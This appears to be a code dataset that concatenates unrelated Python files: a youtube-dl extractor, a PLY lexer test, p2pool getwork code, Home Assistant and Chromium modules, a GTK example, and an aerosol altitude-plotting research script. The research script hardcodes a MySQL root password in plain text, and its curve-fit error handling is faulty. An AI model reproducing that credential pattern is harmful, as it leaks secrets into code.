# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
from slicc.symbols.Action import Action
from slicc.symbols.Event import Event
from slicc.symbols.Func import Func
from slicc.symbols.State import State
from slicc.symbols.RequestType import RequestType
from slicc.symbols.StateMachine import StateMachine
from slicc.symbols.Symbol import Symbol
from slicc.symbols.SymbolTable import SymbolTable
from slicc.symbols.Transition import Transition
from slicc.symbols.Type import Type
from slicc.symbols.Var import Var
|
wndias/bc.repository
|
refs/heads/master
|
script.module.youtube.dl/lib/youtube_dl/extractor/hotstar.py
|
28
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
determine_ext,
int_or_none,
)
class HotStarIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?hotstar\.com/(?:.+?[/-])?(?P<id>\d{10})'
_TESTS = [{
'url': 'http://www.hotstar.com/on-air-with-aib--english-1000076273',
'info_dict': {
'id': '1000076273',
'ext': 'mp4',
'title': 'On Air With AIB - English',
'description': 'md5:c957d8868e9bc793ccb813691cc4c434',
'timestamp': 1447227000,
'upload_date': '20151111',
'duration': 381,
},
'params': {
# m3u8 download
'skip_download': True,
}
}, {
'url': 'http://www.hotstar.com/sports/cricket/rajitha-sizzles-on-debut-with-329/2001477583',
'only_matching': True,
}, {
'url': 'http://www.hotstar.com/1000000515',
'only_matching': True,
}]
_GET_CONTENT_TEMPLATE = 'http://account.hotstar.com/AVS/besc?action=GetAggregatedContentDetails&channel=PCTV&contentId=%s'
_GET_CDN_TEMPLATE = 'http://getcdn.hotstar.com/AVS/besc?action=GetCDN&asJson=Y&channel=%s&id=%s&type=%s'
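    # Unwrap the AVS API envelope: raise (when fatal) on a non-OK resultCode
    # and return only the 'resultObj' payload.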
def _download_json(self, url_or_request, video_id, note='Downloading JSON metadata', fatal=True):
json_data = super(HotStarIE, self)._download_json(url_or_request, video_id, note, fatal=fatal)
if json_data['resultCode'] != 'OK':
if fatal:
raise ExtractorError(json_data['errorDescription'])
return None
return json_data['resultObj']
def _real_extract(self, url):
video_id = self._match_id(url)
video_data = self._download_json(
self._GET_CONTENT_TEMPLATE % video_id,
video_id)['contentInfo'][0]
formats = []
# PCTV for extracting f4m manifest
for f in ('TABLET',):
format_data = self._download_json(
self._GET_CDN_TEMPLATE % (f, video_id, 'VOD'),
video_id, 'Downloading %s JSON metadata' % f, fatal=False)
if format_data:
format_url = format_data['src']
ext = determine_ext(format_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(format_url, video_id, 'mp4', m3u8_id='hls', fatal=False))
elif ext == 'f4m':
                    # f4m downloads produce broken files; skip this format
continue
else:
formats.append({
'url': format_url,
'width': int_or_none(format_data.get('width')),
'height': int_or_none(format_data.get('height')),
})
self._sort_formats(formats)
return {
'id': video_id,
'title': video_data['episodeTitle'],
'description': video_data.get('description'),
'duration': int_or_none(video_data.get('duration')),
'timestamp': int_or_none(video_data.get('broadcastDate')),
'formats': formats,
}
|
aferr/LatticeMemCtl
|
refs/heads/master
|
ext/ply/test/lex_state4.py
|
174
|
# lex_state4.py
#
# Bad state declaration
import sys
if ".." not in sys.path: sys.path.insert(0,"..")
import ply.lex as lex
tokens = [
"PLUS",
"MINUS",
"NUMBER",
]
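# NOTE: 'exclsive' below is a deliberate misspelling of 'exclusive'; this test
# exercises lex.lex()'s error reporting for an invalid state type.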
states = (('comment', 'exclsive'),)
t_PLUS = r'\+'
t_MINUS = r'-'
t_NUMBER = r'\d+'
# Comments
def t_comment(t):
r'/\*'
t.lexer.begin('comment')
print("Entering comment state")
def t_comment_body_part(t):
r'(.|\n)*\*/'
print("comment body %s" % t)
t.lexer.begin('INITIAL')
def t_error(t):
pass
lex.lex()
|
ionux/p2pool
|
refs/heads/master
|
p2pool/bitcoin/getwork.py
|
267
|
'''
Representation of a getwork request/reply
'''
from __future__ import division
from . import data as bitcoin_data
from . import sha256
from p2pool.util import pack
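# Reverse the byte order within each 4-byte word; the getwork protocol
# exchanges the block header ('data' field) in this word-swapped hex form.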
def _swap4(s):
if len(s) % 4:
raise ValueError()
return ''.join(s[x:x+4][::-1] for x in xrange(0, len(s), 4))
class BlockAttempt(object):
def __init__(self, version, previous_block, merkle_root, timestamp, bits, share_target):
self.version, self.previous_block, self.merkle_root, self.timestamp, self.bits, self.share_target = version, previous_block, merkle_root, timestamp, bits, share_target
def __hash__(self):
return hash((self.version, self.previous_block, self.merkle_root, self.timestamp, self.bits, self.share_target))
def __eq__(self, other):
if not isinstance(other, BlockAttempt):
raise ValueError('comparisons only valid with other BlockAttempts')
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
def __repr__(self):
return 'BlockAttempt(%s)' % (', '.join('%s=%r' % (k, v) for k, v in self.__dict__.iteritems()),)
def getwork(self, **extra):
if 'data' in extra or 'hash1' in extra or 'target' in extra or 'midstate' in extra:
raise ValueError()
block_data = bitcoin_data.block_header_type.pack(dict(
version=self.version,
previous_block=self.previous_block,
merkle_root=self.merkle_root,
timestamp=self.timestamp,
bits=self.bits,
nonce=0,
))
getwork = {
'data': _swap4(block_data).encode('hex') + '000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000',
'hash1': '00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000',
'target': pack.IntType(256).pack(self.share_target).encode('hex'),
'midstate': _swap4(sha256.process(sha256.initial_state, block_data[:64])).encode('hex'),
}
getwork = dict(getwork)
getwork.update(extra)
return getwork
@classmethod
def from_getwork(cls, getwork):
attrs = decode_data(getwork['data'])
return cls(
version=attrs['version'],
previous_block=attrs['previous_block'],
merkle_root=attrs['merkle_root'],
timestamp=attrs['timestamp'],
bits=attrs['bits'],
share_target=pack.IntType(256).unpack(getwork['target'].decode('hex')),
)
def update(self, **kwargs):
d = self.__dict__.copy()
d.update(kwargs)
return self.__class__(**d)
def decode_data(data):
return bitcoin_data.block_header_type.unpack(_swap4(data.decode('hex'))[:80])
|
nimbis/django-shop
|
refs/heads/master
|
example/myshop/management/commands/fix_filer_bug_965.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand
from filer.models.imagemodels import Image
class Command(BaseCommand):
help = "Fix https://github.com/divio/django-filer/issues/965"
def handle(self, verbosity, *args, **options):
for img in Image.objects.all():
img.file_data_changed()
img.save()
|
TeamEOS/external_chromium_org
|
refs/heads/lp5.0
|
tools/telemetry/telemetry/results/page_test_results_unittest.py
|
9
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from telemetry.results import base_test_results_unittest
from telemetry.page import page_set
from telemetry.results import page_test_results
class NonPrintingPageTestResults(
page_test_results.PageTestResults):
def __init__(self):
super(NonPrintingPageTestResults, self).__init__()
def _PrintPerfResult(self, *args):
pass
class PageTestResultsTest(base_test_results_unittest.BaseTestResultsUnittest):
def setUp(self):
self.page_set = page_set.PageSet(file_path=os.path.dirname(__file__))
self.page_set.AddPageWithDefaultRunNavigate("http://www.bar.com/")
self.page_set.AddPageWithDefaultRunNavigate("http://www.baz.com/")
self.page_set.AddPageWithDefaultRunNavigate("http://www.foo.com/")
@property
def pages(self):
return self.page_set.pages
def test_failures(self):
results = NonPrintingPageTestResults()
results.AddFailure(self.pages[0], self.CreateException())
results.AddSuccess(self.pages[1])
self.assertEquals(results.pages_that_had_failures,
set([self.pages[0]]))
self.assertEquals(results.successes, [self.pages[1]])
def test_errors(self):
results = NonPrintingPageTestResults()
results.AddError(self.pages[0], self.CreateException())
results.AddSuccess(self.pages[1])
self.assertEquals(results.pages_that_had_errors,
set([self.pages[0]]))
self.assertEquals(results.successes, [self.pages[1]])
def test_errors_and_failures(self):
results = NonPrintingPageTestResults()
results.AddError(self.pages[0], self.CreateException())
results.AddError(self.pages[1], self.CreateException())
results.AddSuccess(self.pages[2])
self.assertEquals(results.pages_that_had_errors_or_failures,
set([self.pages[0], self.pages[1]]))
self.assertEquals(results.successes, [self.pages[2]])
|
aequitas/home-assistant
|
refs/heads/dev
|
homeassistant/components/fritzbox/sensor.py
|
7
|
"""Support for AVM Fritz!Box smarthome temperature sensor only devices."""
import logging
import requests
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
from . import (
ATTR_STATE_DEVICE_LOCKED, ATTR_STATE_LOCKED, DOMAIN as FRITZBOX_DOMAIN)
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Fritzbox smarthome sensor platform."""
_LOGGER.debug("Initializing fritzbox temperature sensors")
devices = []
fritz_list = hass.data[FRITZBOX_DOMAIN]
for fritz in fritz_list:
device_list = fritz.get_devices()
for device in device_list:
if (device.has_temperature_sensor
and not device.has_switch
and not device.has_thermostat):
devices.append(FritzBoxTempSensor(device, fritz))
add_entities(devices)
class FritzBoxTempSensor(Entity):
"""The entity class for Fritzbox temperature sensors."""
def __init__(self, device, fritz):
"""Initialize the switch."""
self._device = device
self._fritz = fritz
@property
def name(self):
"""Return the name of the device."""
return self._device.name
@property
def state(self):
"""Return the state of the sensor."""
return self._device.temperature
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return TEMP_CELSIUS
def update(self):
"""Get latest data and states from the device."""
try:
self._device.update()
except requests.exceptions.HTTPError as ex:
_LOGGER.warning("Fritzhome connection error: %s", ex)
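            # the session may have expired; log in again so the next update can succeed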
self._fritz.login()
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attrs = {
ATTR_STATE_DEVICE_LOCKED: self._device.device_lock,
ATTR_STATE_LOCKED: self._device.lock,
}
return attrs
|
annahs/atmos_research
|
refs/heads/master
|
NC_plot_Dg_sigma_BCmassconc_DpDc_vs_altitude-fullcampaign.py
|
1
|
import sys
import os
import numpy as np
from pprint import pprint
from datetime import datetime
from datetime import timedelta
import mysql.connector
import math
import matplotlib.pyplot as plt
import matplotlib.colors
from matplotlib import dates
from mpl_toolkits.basemap import Basemap
import calendar
from scipy.optimize import curve_fit
from coating_info_from_raw_signal import CoatingData
cloud_droplet_conc = 0.5
savefig = False
show_distr_plots = False
coating_data_from_raw = False
#alt parameters
min_alt = 0
max_alt = 6000
alt_incr = 1000
#coating data parameters
coating_min_BC_VED = 160
coating_max_BC_VED = 180
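#convert the VED limits (nm) to single-particle rBC mass (fg), assuming spherical cores with a density of 1.8 g/cm3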
coating_min_rBC_mass = ((coating_min_BC_VED/(10.**7))**3)*(math.pi/6.)*1.8*(10.**15)
coating_max_rBC_mass = ((coating_max_BC_VED/(10.**7))**3)*(math.pi/6.)*1.8*(10.**15)
print coating_min_rBC_mass, coating_max_rBC_mass
#Dg and sigma data parameters
bin_value_min = 80
bin_value_max = 220
bin_incr = 10
bin_number_lim = (bin_value_max-bin_value_min)/bin_incr
#constants
R = 8.3144621 # in m3*Pa/(K*mol)
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/lookup tables/coating_lookup_table_POLAR6_2015_UBCSP2-nc(2p26,1p26)-fullPSLcalib_used_factor545.lupckl'
#lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/lookup tables/coating_lookup_table_POLAR6_2015_UBCSP2-nc(2p26,1p26)-200nmPSLcalib_used_factor446.lupckl'
flight_times = {
'science 1' : [datetime(2015,4,5,9,43),datetime(2015,4,5,13,48),15.6500, 78.2200, 'Longyearbyen (sc1)'] , #longyearbyen
#'ferry 1' : [datetime(2015,4,6,9,0),datetime(2015,4,6,11,0),15.6500, 78.2200] ,
#'ferry 2' : [datetime(2015,4,6,15,0),datetime(2015,4,6,18,0),-16.6667, 81.6000] ,
'science 2' : [datetime(2015,4,7,16,31),datetime(2015,4,7,20,48),-62.338, 82.5014,'Alert (sc2-5)'] , #Alert
'science 3' : [datetime(2015,4,8,13,51),datetime(2015,4,8,16,43),-62.338, 82.5014,'Alert (sc2-5)'] , #Alert
'science 4' : [datetime(2015,4,8,17,53),datetime(2015,4,8,21,22),-70.338, 82.5014,'Alert (sc2-5)'] , #Alert
'science 5' : [datetime(2015,4,9,13,50),datetime(2015,4,9,17,47),-62.338, 82.0,'Alert (sc2-5)'] , #Alert
##'ferry 3' : [datetime(2015,4,10,14,0),datetime(2015,4,10,17,0),-75.338, 81] ,
'science 6' : [datetime(2015,4,11,15,57),datetime(2015,4,11,21,16),-90.9408, 80.5,'Eureka (sc6-7)'] , #eureka
'science 7' : [datetime(2015,4,13,15,14),datetime(2015,4,13,20,52),-95, 80.1,'Eureka (sc6-7)'] , #eureka
##'science 8' : [datetime(2015,4,20,15,49),datetime(2015,4,20,19,49),-133.7306, 67.1,'Inuvik (sc8-10)'], #inuvik
#'science 9' : [datetime(2015,4,20,21,46),datetime(2015,4,21,1,36),-133.7306, 69.3617,'Inuvik (sc8-10)'] , #inuvik
#'science 10' : [datetime(2015,4,21,16,07),datetime(2015,4,21,21,24),-131, 69.55,'Inuvik (sc8-10)'], #inuvik
#
}
#database connection
cnx = mysql.connector.connect(user='root', password='Suresh15', host='localhost', database='black_carbon')
cursor = cnx.cursor()
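#lognormal function used to fit the binned mass size distributions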
def lognorm(x_vals, A, w, xc):
return A/(np.sqrt(2*math.pi)*w*x_vals)*np.exp(-(np.log(x_vals/xc))**2/(2*w**2))
fit_bins = []
for x in range (30,800,1):
fit_bins.append(x)
plot_data={}
for flight in flight_times:
print flight
lower_alt = min_alt
start_time = flight_times[flight][0]
end_time = flight_times[flight][1]
UNIX_start_time = calendar.timegm(start_time.utctimetuple())
UNIX_end_time = calendar.timegm(end_time.utctimetuple())
while (lower_alt + alt_incr) <= max_alt:
#make data binning dicts for the interval
mass_binned_data = {}
number_binned_data = {}
i = bin_value_min
while i < bin_value_max:
mass_binned_data[i] = []
number_binned_data[i] = []
i+=bin_incr
#make arrays to hold data for each alt interval
total_mass_concs = []
total_number_concs = []
Dp_Dc_list = []
print lower_alt, ' to ' , (lower_alt + alt_incr), 'm'
#get coating data
cursor.execute(('''SELECT bc.rBC_mass_fg_jancalib, bc.coat_thickness_nm_jancalib, bc.incand_amp, bc.LF_scat_amp
FROM polar6_coating_2015 bc
JOIN polar6_flight_track_details ftd on bc.flight_track_data_id = ftd.id
JOIN polar6_fssp_cloud_data fssp on bc.fssp_id = fssp.id
WHERE ftd.alt >=%s and ftd.alt < %s and bc.rBC_mass_fg >= %s and bc.rBC_mass_fg < %s and bc.particle_type = %s and bc.instrument = %s and bc.UNIX_UTC_ts >= %s and bc.UNIX_UTC_ts < %s and fssp.FSSPTotalConc <=%s'''),
(lower_alt,(lower_alt + alt_incr),coating_min_rBC_mass,coating_max_rBC_mass,'incand','UBCSP2',UNIX_start_time,UNIX_end_time,cloud_droplet_conc))
coating_data = cursor.fetchall()
no_coats = 0
coats = []
for row in coating_data:
incand_amp = row[2]
LEO_amp = row[3]
if LEO_amp >= 45000 or LEO_amp < 0:
continue
rBC_mass = row[0]
coat_th = row[1]
core_VED = (((rBC_mass/(10**15*1.8))*6/3.14159)**(1/3.0))*10**7
if coat_th != None:
coats.append(coat_th)
Dp_Dc = ((2*coat_th)+core_VED)/core_VED
Dp_Dc_list.append(Dp_Dc)
else:
no_coats += 1
Dp_Dc_list.append(np.nan)
#print no_coats*100./len(coating_data)
#get mass data
cursor.execute(('''SELECT bnm.70t80,bnm.80t90,bnm.90t100,bnm.100t110,bnm.110t120,bnm.120t130,bnm.130t140,bnm.140t150,bnm.150t160,bnm.160t170,bnm.170t180,bnm.180t190,bnm.190t200,bnm.200t210,bnm.210t220,bnm.sampled_vol,bnm.total_mass, ftd.temperature_C,ftd.BP_Pa
FROM polar6_binned_mass_and_sampled_volume_alertcalib bnm
JOIN polar6_flight_track_details ftd ON bnm.flight_track_data_id = ftd.id
JOIN polar6_fssp_cloud_data fssp on bnm.fssp_id = fssp.id
WHERE ftd.alt >=%s and ftd.alt < %s and bnm.UNIX_UTC_ts >= %s and bnm.UNIX_UTC_ts < %s and fssp.FSSPTotalConc <=%s'''),
(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time,cloud_droplet_conc))
mass_data = cursor.fetchall()
for row in mass_data:
volume_sampled = row[15]
total_mass = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
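            #scale the measured concentration to STP (273 K, 101325 Pa)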
correction_factor_for_STP = (101325/pressure)*(temperature/273)
total_mass_conc_value = total_mass*correction_factor_for_STP/volume_sampled
total_mass_concs.append(total_mass_conc_value)
#append STP corrected mass conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
mass_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#get number data
cursor.execute(('''SELECT bnn.70t80,bnn.80t90,bnn.90t100,bnn.100t110,bnn.110t120,bnn.120t130,bnn.130t140,bnn.140t150,bnn.150t160,bnn.160t170,bnn.170t180,bnn.180t190,bnn.190t200,bnn.200t210,bnn.210t220,bnn.sampled_vol,bnn.total_number, ftd.temperature_C,ftd.BP_Pa
FROM polar6_binned_number_and_sampled_volume_alertcalib bnn
JOIN polar6_flight_track_details ftd ON bnn.flight_track_data_id = ftd.id
JOIN polar6_fssp_cloud_data fssp on bnn.fssp_id = fssp.id
WHERE ftd.alt >=%s and ftd.alt < %s and bnn.UNIX_UTC_ts >= %s and bnn.UNIX_UTC_ts < %s and fssp.FSSPTotalConc <=%s'''),
(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time,cloud_droplet_conc))
number_data = cursor.fetchall()
for row in number_data:
volume_sampled = row[15]
total_number = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
correction_factor_for_STP = (101325/pressure)*(temperature/273)
total_number_conc_value = total_number*correction_factor_for_STP/volume_sampled
total_number_concs.append(total_number_conc_value)
#append STP corrected number conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
number_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#make lists from binned data and sort
binned_list = []
for key in mass_binned_data:
binned_list.append([key, np.mean(mass_binned_data[key])])
binned_list.sort()
number_binned_list = []
for key in number_binned_data:
number_binned_list.append([key, np.mean(number_binned_data[key])])
number_binned_list.sort()
##normalize
for row in binned_list:
row[1] = row[1]/(math.log((row[0]+10))-math.log(row[0]))
mass_conc_bins = np.array([row[0] for row in binned_list])
mass_concs = np.array([row[1] for row in binned_list])
for row in number_binned_list:
row[1] = row[1]/(math.log(row[0]+10)-math.log(row[0]))
number_conc_bins = np.array([row[0] for row in number_binned_list])
number_concs = np.array([row[1] for row in number_binned_list])
#fit with lognormal
#get Dg and sigma and write to dict
try:
popt, pcov = curve_fit(lognorm, mass_conc_bins, mass_concs)
fit_y_vals = []
for bin in fit_bins:
fit_val = lognorm(bin, popt[0], popt[1], popt[2])
fit_y_vals.append(fit_val)
Dg = fit_bins[np.argmax(fit_y_vals)]
except:
print 'fit failure'
Dg = np.nan
        #reject the fit if the width parameter is unreasonably large or the fit failed
if popt[1] > 5 or np.isnan(Dg):
print 'sigma too high'
sigma = np.nan
Dg = np.nan
else:
sigma = math.exp(popt[1])
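        #fraction of the fitted lognormal within the sampled size range; total mass is divided by this to estimate the full distribution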
fraction_sampled = sum(fit_y_vals[65:220])/sum(fit_y_vals[65:480])
#add overall data to dict
mean_alt = lower_alt + alt_incr/2
if mean_alt not in plot_data:
plot_data[mean_alt] = []
plot_data[mean_alt].append([Dg,sigma,np.mean(total_mass_concs)/fraction_sampled,np.mean(Dp_Dc_list),fraction_sampled,total_number_concs,coats])
####plotting
if show_distr_plots == True:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.semilogx(number_conc_bins,number_concs, color = 'g',marker='o')
ax1.semilogx(mass_conc_bins,mass_concs, color = 'b',marker='o')
ax1.semilogx(fit_bins,fit_y_vals, color = 'r',marker=None)
plt.ylabel('dM/dlog(VED)')
ax1.set_xlabel('VED (nm)')
plt.show()
lower_alt += alt_incr
cnx.close()
print 'next step . . .'
##
plot_list = []
for mean_alt in plot_data:
sampled_fraction = [row[4] for row in plot_data[mean_alt]][0]
mean_dg = np.mean([row[0] for row in plot_data[mean_alt]])
min_dg = mean_dg-np.min([row[0] for row in plot_data[mean_alt]])
max_dg = np.max([row[0] for row in plot_data[mean_alt]])-mean_dg
mean_sigma = np.mean([row[1] for row in plot_data[mean_alt]])
min_sigma = mean_sigma-np.min([row[1] for row in plot_data[mean_alt]])
max_sigma = np.max([row[1] for row in plot_data[mean_alt]])-mean_sigma
mean_mass = np.mean([row[2] for row in plot_data[mean_alt]])
p25_err = mean_mass-np.min([row[2] for row in plot_data[mean_alt]])
p75_err = np.max([row[2] for row in plot_data[mean_alt]])-mean_mass
#combined_mass_list = []
#for row in plot_data[mean_alt]:
# combined_mass_list = combined_mass_list +row[2] #concatenate lists
#median_mass = np.median(combined_mass_list)/sampled_fraction
#p25_err = median_mass-np.percentile(combined_mass_list,25)/sampled_fraction
#p75_err = np.percentile(combined_mass_list,75)/sampled_fraction -median_mass
mean_Dp_Dc = np.mean([row[3] for row in plot_data[mean_alt]])
Dp_Dc_p25_err = mean_Dp_Dc-np.min([row[3] for row in plot_data[mean_alt]])
Dp_Dc_p75_err = np.max([row[3] for row in plot_data[mean_alt]])-mean_Dp_Dc
#combined_DpDc_list = []
#for row in plot_data[mean_alt]:
# combined_DpDc_list = combined_DpDc_list +row[3] #concatenate lists
#median_Dp_Dc = np.median(combined_DpDc_list)
#Dp_Dc_p25_err = median_Dp_Dc-np.percentile(combined_DpDc_list,25)
#Dp_Dc_p75_err = np.percentile(combined_DpDc_list,75)-median_Dp_Dc
combined_numb_list = []
for row in plot_data[mean_alt]:
combined_numb_list = combined_numb_list +row[5] #concatenate lists
median_number_conc = np.median(combined_numb_list)
number_p25_err = median_number_conc-np.percentile(combined_numb_list,25)
number_p75_err = np.percentile(combined_numb_list,75)-median_number_conc
combined_coating_list = []
for row in plot_data[mean_alt]:
combined_coating_list = combined_coating_list +row[6] #concatenate lists
mean_coating = np.mean(combined_coating_list)
plot_list.append([mean_alt,mean_dg,min_dg,max_dg,mean_sigma,min_sigma,max_sigma,mean_mass,p25_err,p75_err,mean_Dp_Dc,Dp_Dc_p25_err,Dp_Dc_p75_err,median_number_conc,number_p25_err,number_p75_err])
plot_list.sort()
print mean_alt, mean_coating
altitudes = [row[0] for row in plot_list]
Dgs_mean = [row[1] for row in plot_list]
Dgs_min_err = [row[2] for row in plot_list]
Dgs_max_err = [row[3] for row in plot_list]
sigmas_mean = [row[4] for row in plot_list]
sigmas_min_err = [row[5] for row in plot_list]
sigmas_max_err = [row[6] for row in plot_list]
mass_med = [row[7] for row in plot_list]
mass_25 = [row[8] for row in plot_list]
mass_75 = [row[9] for row in plot_list]
Dp_Dc_med = [row[10] for row in plot_list]
Dp_Dc_25 = [row[11] for row in plot_list]
Dp_Dc_75 = [row[12] for row in plot_list]
number_med = [row[13] for row in plot_list]
number_25 = [row[14] for row in plot_list]
number_75 = [row[15] for row in plot_list]
fig = plt.figure(figsize=(12,12))
upper_alt = 6500
ax1 = plt.subplot2grid((2,2), (0,0), colspan=1)
ax2 = plt.subplot2grid((2,2), (0,1), colspan=1)
ax3 = plt.subplot2grid((2,2), (1,0), colspan=1)
ax4 = plt.subplot2grid((2,2), (1,1), colspan=1)
#ax5 = plt.subplot2grid((3,2), (1,1), colspan=1)
ax1.errorbar(Dgs_mean,altitudes,xerr = [Dgs_min_err,Dgs_max_err],fmt='o',linestyle='-', color = 'b')
ax1.set_ylabel('altitude (m)')
ax1.set_xlabel('Dg (from dM/dlog(D) ng/m3-STP)')
ax1.set_xlim(100,220)
ax1.set_ylim(0,upper_alt)
ax2.errorbar(sigmas_mean,altitudes,xerr = [sigmas_min_err,sigmas_max_err],fmt='o',linestyle='-', color = 'grey')
ax2.set_xlabel('sigma (from dM/dlog(D) ng/m3-STP)')
ax2.set_ylabel('altitude (m)')
ax2.set_xlim(1,2)
ax2.set_ylim(0,upper_alt)
ax3.errorbar(mass_med,altitudes,xerr = [mass_25,mass_75],fmt='o',linestyle='-', color = 'green')
ax3.set_xlabel('total mass conc (ng/m3 - STP)')
ax3.set_ylabel('altitude (m)')
ax3.set_xlim(0,100)
ax3.set_ylim(0,upper_alt)
ax4.errorbar(Dp_Dc_med,altitudes,xerr=[Dp_Dc_25,Dp_Dc_75],fmt='o',linestyle='-', color = 'red')
ax4.set_xlabel('Dp/Dc (rBC cores from 160-180nm)')
ax4.set_ylabel('altitude (m)')
ax4.set_xlim(0.8,2.4)
ax4.set_ylim(0,upper_alt)
#ax5.errorbar(number_med,altitudes,xerr=[number_25,number_75],fmt='o',linestyle='-', color = 'm')
#ax5.set_xlabel('total number conc (#/cm3 - STP)')
#ax5.set_ylabel('altitude (m)')
#ax5.set_xlim(0,50)
#ax5.set_ylim(0,upper_alt)
##ax5.set_xscale('log')
#fig.suptitle('Science Flights 1-7', fontsize=20)
dir = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/'
os.chdir(dir)
if savefig == True:
#plt.savefig('altitude dependent plots - '+flight_times[flight][4]+' - cloud-free.png', bbox_inches='tight')
plt.savefig('altitude dependent plots Dp sig mass DpDc - sc1-7 - cloud-free.png', bbox_inches='tight')
plt.show()
|
Programmica/python-gtk3-tutorial
|
refs/heads/master
|
_examples/cellrendererpixbuf.py
|
1
|
#!/usr/bin/env python3
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from gi.repository import GdkPixbuf
class CellRendererPixbuf(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self)
self.set_title("CellRendererPixbuf")
self.connect("destroy", Gtk.main_quit)
liststore = Gtk.ListStore(str, GdkPixbuf.Pixbuf)
icon = GdkPixbuf.Pixbuf.new_from_file_at_size("../_resources/fedora.ico", 16, 16)
liststore.append(["Fedora", icon])
icon = GdkPixbuf.Pixbuf.new_from_file_at_size("../_resources/opensuse.ico", 16, 16)
liststore.append(["OpenSuSE", icon])
icon = GdkPixbuf.Pixbuf.new_from_file_at_size("../_resources/gentoo.ico", 16, 16)
liststore.append(["Gentoo", icon])
treeview = Gtk.TreeView()
treeview.set_model(liststore)
self.add(treeview)
cellrenderertext = Gtk.CellRendererText()
treeviewcolumn = Gtk.TreeViewColumn("Distribution")
treeview.append_column(treeviewcolumn)
treeviewcolumn.pack_start(cellrenderertext, True)
treeviewcolumn.add_attribute(cellrenderertext, "text", 0)
cellrendererpixbuf = Gtk.CellRendererPixbuf()
treeviewcolumn = Gtk.TreeViewColumn("Logo")
treeview.append_column(treeviewcolumn)
treeviewcolumn.pack_start(cellrendererpixbuf, False)
treeviewcolumn.add_attribute(cellrendererpixbuf, "pixbuf", 1)
window = CellRendererPixbuf()
window.show_all()
Gtk.main()
|
aweinstock314/servo
|
refs/heads/master
|
tests/wpt/harness/wptrunner/__init__.py
|
1447
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
|
Winterflower/mdf
|
refs/heads/master
|
mdf/lab/progress.py
|
3
|
import sys
import uuid
from mdf.remote import messaging
_fmt = "%Y-%m-%d %H:%M:%S"
class ProgressBar(object):
def __init__(self, start_date, end_date):
# this is only approximate as it doesn't take weekends into account
self.start_date = start_date
self.num_days = (end_date - start_date).days
self._date = start_date
self.prog_bar = '[]'
self.fill_char = '*'
self.width = 40
self.set_date(self.start_date)
# register our callback with the messaging api
self._subj = uuid.uuid1()
messaging.register_message_handler(self._subj, self.__msg_callback)
def __call__(self, date, ctx):
# send to the parent process (or call directly if this is the parent process)
messaging.send_message(self._subj, date)
def __del__(self):
try:
# this will fail in the child processes but just ignore it
messaging.unregister_message_handler(self._subj, self.__msg_callback)
except RuntimeError:
pass
def __msg_callback(self, subject, date):
if date <= self._date:
return
self.set_date(date)
sys.stdout.write("\r")
sys.stdout.write(str(self))
sys.stdout.flush()
def set_date(self, date):
done = float((date - self.start_date).days)
self.__update_amount((done / self.num_days) * 100.0)
self.prog_bar += \
' processed %s - %d of %s days complete' % (date.strftime(_fmt), done, self.num_days)
self._date = date
def __update_amount(self, new_amount):
percent_done = int(round((new_amount / 100.0) * 100.0))
all_full = self.width - 2
